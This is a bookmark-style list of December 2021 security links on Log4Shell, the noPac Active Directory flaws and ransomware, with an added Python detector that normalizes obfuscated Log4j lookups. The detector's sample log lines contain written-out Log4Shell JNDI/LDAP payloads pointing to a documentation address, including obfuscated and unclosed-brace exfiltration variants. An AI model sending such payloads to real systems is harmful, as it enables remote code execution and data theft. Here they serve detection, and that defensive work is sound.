Márcio Almeida on Twitter: "Just added support for LDAP Serialized Payloads in the JNDI-Exploit-Kit. This attack path works in *ANY* java version as long as the classes used in the Serialized payload are in the application classpath. Do not rely on your java version being up-to-date and update your log4j ASAP! https://t.co/z3B2UolisR" / Twitter
https://twitter.com/marcioalm/status/1470361495405875200
GitHub - WazeHell/sam-the-admin: Exploiting CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user
https://github.com/WazeHell/sam-the-admin
Zero-Day Exploit Targeting Popular Java Library Log4j
https://www.govcert.ch/blog/zero-day-exploit-targeting-popular-java-library-log4j/
Diavol Ransomware
https://thedfirreport.com/2021/12/13/diavol-ransomware/
KB5008380—Authentication updates (CVE-2021-42287) - Microsoft Support
https://support.microsoft.com/en-us/topic/kb5008380-authentication-updates-cve-2021-42287-9dafac11-e0d0-4cb8-959a-143bd0201041
Now You Serial, Now You Don’t — Systematically Hunting for Deserialization Exploits | Mandiant
https://www.mandiant.com/resources/hunting-deserialization-exploits
eXploit – CVE-2021-42287/CVE-2021-42278 Weaponisation
https://exploit.ph/cve-2021-42287-cve-2021-42278-weaponisation.html
Japan Hackers Association (一般社団法人日本ハッカー協会) on Twitter: "Regarding the log4j vulnerability that is being described as disaster-level, we have received many comments that information which ideally ought to be shared widely, such as attacks actually observed and the various obfuscated attack patterns, is being withheld from publication and sharing in Japan out of concern that it might constitute an 'unauthorized command electromagnetic record' (the malware offence in Japan's Penal Code)." / Twitter
https://twitter.com/japanhackera/status/1470229222681878530
GitHub - fullhunt/log4j-scan: A fully automated, accurate, and extensive scanner for finding log4j RCE CVE-2021-44228
https://github.com/fullhunt/log4j-scan
Is sharing information on attack techniques that exploit the "Log4j" vulnerability illegal? We asked the Japan Hackers Association - ITmedia NEWS
https://www.itmedia.co.jp/news/articles/2112/13/news163.html
Tweet / Twitter
https://twitter.com/TinkerSec/status/1470411644153233409
Log4Shell attacks began two weeks ago, Cisco and Cloudflare say
https://therecord.media/log4shell-attacks-began-two-weeks-ago-cisco-and-cloudflare-say/
Will Dormann on Twitter: "@Laughing_Mantis Well that's terrifying. https://t.co/Sy3R4suwGK" / Twitter
https://twitter.com/wdormann/status/1470409556303958017?t=UOruiPMQpKtObRhf-bckNA&s=19
Greg Linares (Mantis) on Twitter: "#Log4J based on what I've seen, there is evidence that a worm will be developed for this in the next 24 to 48 hours. Self propagating with the ability to stand up a self hosted server on compromised endpoints. In addition to spraying traffic, dropping files, it will have c2c" / Twitter
https://twitter.com/Laughing_Mantis/status/1470165580736987137
The DFIR Report on Twitter: "Diavol Ransomware ➡️Initial Access: Zip->ISO loading BazarLoader ➡️Discovery: Net, Ping, AdFind, Advanced IP Scanner, ShareFinder ➡️C2: #CobaltStrike & #BazarLoader ➡️Lateral Movement: RDP, AnyDesk ➡️Exfil: FileZilla, ufile ➡️Impact: Diavol ransomware https://t.co/JWZGF83nqu" / Twitter
https://twitter.com/TheDFIRReport/status/1470373411218239488
What do you need to know about the log4j (Log4Shell) vulnerability? - YouTube
https://youtu.be/oC2PZB5D3Ys
TryHackMe | Solar, exploiting log4j
https://tryhackme.com/room/solar
Tom Anthony on Twitter: "Interesting Log4j payload I discovered, simply omit the closing brace }, and now you will potentially get a bunch of data exfiltrated to your server until the next } appears in that data. Had it work on a FANG target... https://t.co/1aR8yLcTbc" / Twitter
https://twitter.com/tomanthonyseo/status/1470374984749133825
GitHub - curated-intel/Log4Shell-IOCs: A collection of intelligence about Log4Shell and its exploitation activity.
https://github.com/curated-intel/Log4Shell-IOCs
The Cyber Startup Observatory - The Global Cyber Innovation Network
https://cyberstartupobservatory.com
Apache Log4j Vulnerability — Log4Shell — Widely Under Active Attack
https://thehackernews.com/2021/12/apache-log4j-vulnerability-log4shell.html
Arrest in Romania of a ransomware affiliate scavenging for sensitive data | Europol
https://www.europol.europa.eu/media-press/newsroom/news/arrest-in-romania-of-ransomware-affiliate-scavenging-for-sensitive-data
ThreatFox | log4j
https://threatfox.abuse.ch/browse/tag/log4j/
vx-underground
https://vx-underground.org
GitHub - silentsignal/burp-log4shell: Log4Shell scanner for Burp Suite
https://github.com/silentsignal/burp-log4shell
Ukraine arrests 51 for selling data of 300 million people in US, EU
https://www.bleepingcomputer.com/news/security/ukraine-arrests-51-for-selling-data-of-300-million-people-in-us-eu/
Log4j Detection and Response Playbook - TrustedSec
https://hubs.la/Q010JRCx0
Greg Linares (Mantis) on Twitter: "#log4j Update: IF YOU WERE DEPENDING ON JAVA VERSIONS TO PROTECT YOU FROM RCE INSTEAD OF DIRECTLY PATCHING LOG4J THAT IS NO LONGER A VIABLE MITIGATION STRATEGY *ALL* VERSIONS OF JAVA CAN NOW TRIGGER FULL RCE DUE TO A BYPASS PATCH LOG4J ASAP https://t.co/08Vk9pXBGN" / Twitter
https://twitter.com/Laughing_Mantis/status/1470412026119798786
GitHub - cube0x0/noPac: CVE-2021-42287/CVE-2021-42278 Scanner & Exploiter.
https://github.com/cube0x0/noPac
FBI - Tips
http://tips.fbi.gov
Capitol Violence — FBI
https://fbi.gov/wanted/capitol-violence
TrustedSec on Twitter: "Join us & @Binary_Defense for a #webcast on the latest news #log4j vulnerability TOMORROW at 2 p.m. EST! We will discuss how the vulnerability works with a quick demo, detecting attacks, & how you can respond with prevention or mitigation. https://t.co/vqDwrg98E9" / Twitter
https://twitter.com/TrustedSec/status/1470491609842262026
Releases · Neo23x0/Fenrir
https://github.com/Neo23x0/Fenrir/releases
Patch Now Apache Log4j Vulnerability Called Log4Shell Actively Exploited
https://research.trendmicro.com/3INubVV
GitHub’s response to Log4j vulnerability CVE-2021-44228 | The GitHub Blog
https://github.blog/2021-12-13-githubs-response-to-log4j-vulnerability-cve-2021-44228/
Log4Shell Hell: anatomy of an exploit outbreak – Sophos News
https://news.sophos.com/en-us/2021/12/12/log4shell-hell-anatomy-of-an-exploit-outbreak/
No Lie with Brian Tyler Cohen on Twitter: "JUST IN: An arena in South Dakota is holding a “Dash for Cash” where teachers get on their knees and fight for one dollar bills that they can use for classroom supplies while spectators watch and cheer. (h/t @AnnieTodd96) https://t.co/jIht84Ls9W" / Twitter
https://twitter.com/NoLieWithBTC/status/1470141286502080519
Ten families of malicious samples are spreading using the Log4j2 vulnerability now - 360 Netlab Blog
https://blog.netlab.360.com/ten-families-of-malicious-samples-are-spreading-using-the-log4j2-vulnerability-now/
Ransomware attack shuts down computer systems for Virginia legislative agencies
https://richmond.com/news/state-and-regional/govt-and-politics/ransomware-attack-shuts-down-computer-systems-for-virginia-legislative-agencies/article_1603183b-cc58-5f2e-bad9-99693582b79c.html#tracking-source=home-top-story
Black Hills Information Security on Twitter: "We are doing an emergency newscast on the Log4Shell vulnerability. Today, 4:30pm ET -- https://t.co/B5EwWELEUF Why? Well, with most vulnerabilities it is simply an issue of "install the patch" — this one is different. How is this different? Let's have a chat to find out." / Twitter
https://twitter.com/BHinfoSecurity/status/1470412775063236622
sAMAccountName spoofing - The Hacker Recipes
https://www.thehacker.recipes/ad/movement/kerberos/samaccountname-spoofing
Ransomware affiliate arrested in Romania
https://therecord.media/ransomware-affiliate-arrested-in-romania/
Log4j (CVE-2021-44228) RCE Vulnerability Explained - YouTube
https://www.youtube.com/watch?v=0-abhd-CLwQ
BApp Store listing - PortSwigger
https://portswigger.net/bappstore/b011be53649346dd87276bca41ce8e8f
Hackers start pushing malware in worldwide Log4Shell attacks
https://www.bleepingcomputer.com/news/security/hackers-start-pushing-malware-in-worldwide-log4shell-attacks/
Collection of WAF evasion payloads · GitHub
https://gist.github.com/ZephrFish/32249cae56693c1e5484888267d07d39
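Added example, not code from the gist above or from any of the linked tools: a static normalizer for Log4j lookup syntax that collapses the nested-lookup WAF evasions collected in the gist (`${lower:j}`, `${upper:n}`, `${::-d}`, `${env:X:-i}`, `${date:'j'}`) innermost-first, the way Log4j itself evaluates them, and then flags `${jndi:` in the result. It also reports the unclosed-brace variant from Tom Anthony's tweet, where everything up to the next `}` in the logged data becomes part of the LDAP URL sent to the attacker, and it keeps runtime lookups such as `${sys:java.version}` visible as placeholders, since those are what an attacker nests inside the URL to exfiltrate values. The access-log lines and the 203.0.113.5 / 198.51.100.7 addresses are constructed test input; treating `env:`/`sys:` lookups that carry a default as failing on the target is an analyst's assumption, because the target's environment is unknown.

```python
import re

# Innermost lookup: "${" ... "}" whose body contains no further "${".
# Log4j evaluates these first, so the normalizer resolves in the same order.
_INNER = re.compile(r"\$\{((?:(?!\$\{)[^}])*)\}")
# A jndi lookup in normalized text; group 2 is empty when the brace is never closed.
_JNDI = re.compile(r"\$\{\s*jndi\s*:([^}]*)(\}?)", re.IGNORECASE)
# Marks a jndi lookup already resolved so _INNER does not match it again.
_SENTINEL = "\x00{"


def resolve_lookup(body: str) -> str:
    """Statically evaluate one non-nested lookup body.

    Only the lookups attackers use to spell out 'jndi' are evaluated for real
    (lower, upper, quoted date literals, ':-' defaults). Runtime lookups such as
    ${sys:java.version} are kept as a visible <prefix:key> placeholder because
    an attacker embeds them in the LDAP URL to exfiltrate their values.
    """
    prefix = body.partition(":")[0].strip().lower()
    if prefix == "jndi":
        return _SENTINEL + body + "}"   # keep it, but stop re-matching it
    default = None
    if ":-" in body:
        body, default = body.split(":-", 1)
    prefix, _, key = body.partition(":")
    prefix = prefix.strip().lower()
    if prefix == "lower":
        return key.lower()
    if prefix == "upper":
        return key.upper()
    if prefix == "date" and re.fullmatch(r"'[^']*'", key):
        return key[1:-1]                # ${date:'j'} formats a quoted literal
    if default is not None:
        # ${::-j}, ${env:NOPE:-j}: ASSUMPTION - the lookup fails on the target
        # (its environment is unknown), so Log4j would fall back to the default.
        return default
    return f"<{prefix}:{key}>"


def normalize(line: str, max_rounds: int = 50) -> str:
    """Collapse nested and obfuscated lookups innermost-first until none remain."""
    for _ in range(max_rounds):
        new = _INNER.sub(lambda m: resolve_lookup(m.group(1)), line)
        if new == line:
            break
        line = new
    return line.replace(_SENTINEL, "${")


def detect(line: str) -> dict:
    """Normalize one log line and report every jndi lookup it still contains.

    'closed' is False for the unclosed-brace payload, where the target URL swallows
    whatever the application logs after it until the next '}' appears.
    """
    norm = normalize(line)
    hits = [{"target": m.group(1).strip(), "closed": m.group(2) == "}"}
            for m in _JNDI.finditer(norm)]
    return {"normalized": norm, "jndi": hits,
            "unclosed": any(not h["closed"] for h in hits)}


def scan(lines):
    """Return (line, detect-result) pairs for lines that carry a jndi lookup."""
    return [(line, r) for line in lines if (r := detect(line))["jndi"]]


# Constructed access-log lines (not real traffic); 203.0.113.5 is a documentation address.
SAMPLE_LINES = [
    '198.51.100.7 "GET /login HTTP/1.1" 200 "${jndi:ldap://203.0.113.5:1389/a}"',
    '198.51.100.7 "GET / HTTP/1.1" 200 "${${lower:j}${lower:N}${::-d}${env:NOPE:-i}:${lower:L}dap://203.0.113.5/x}"',
    'X-Api-Version: ${${lower:j}ndi:ldap://203.0.113.5/x',
    '198.51.100.7 "GET / HTTP/1.1" 200 "${jndi:ldap://203.0.113.5/${sys:java.version}}"',
    '198.51.100.7 "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"',
]

if __name__ == "__main__":
    for line, result in scan(SAMPLE_LINES):
        for hit in result["jndi"]:
            state = "closed" if hit["closed"] else "UNCLOSED (exfil until next '}')"
            print(f"{state:38} {hit['target']}\n    from: {line}")
```

Run it on a real access or application log one line at a time; the normalized string is what to put in a ticket, since the raw payload may not contain the literal "jndi" anywhere. A regex on the raw line for `${jndi:` alone misses the second and third sample lines.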
Matthew Prince 🌥 on Twitter: "Earliest evidence we’ve found so far of #Log4J exploit is 2021-12-01 04:36:50 UTC. That suggests it was in the wild at least 9 days before publicly disclosed. However, don’t see evidence of mass exploitation until after public disclosure." / Twitter
https://twitter.com/eastdakota/status/1469800951351427073
Triage | Behavioral Report
https://tria.ge/211213-wjq52sead2/behavioral1
The #GCHQChristmasChallenge is here! - GCHQ.GOV.UK
https://www.gchq.gov.uk/news/christmas-card-2021
Microsoft Details Building Blocks of Widely Active Qakbot Banking Trojan
https://thehackernews.com/2021/12/microsoft-details-building-blocks-of.html
GoToWebinar registration page
https://attendee.gotowebinar.com/register/5384784947517148427
Log4Shell: Reconnaissance and post exploitation network detection – NCC Group Research
https://research.nccgroup.com/2021/12/12/log4shell-reconnaissance-and-post-exploitation-network-detection/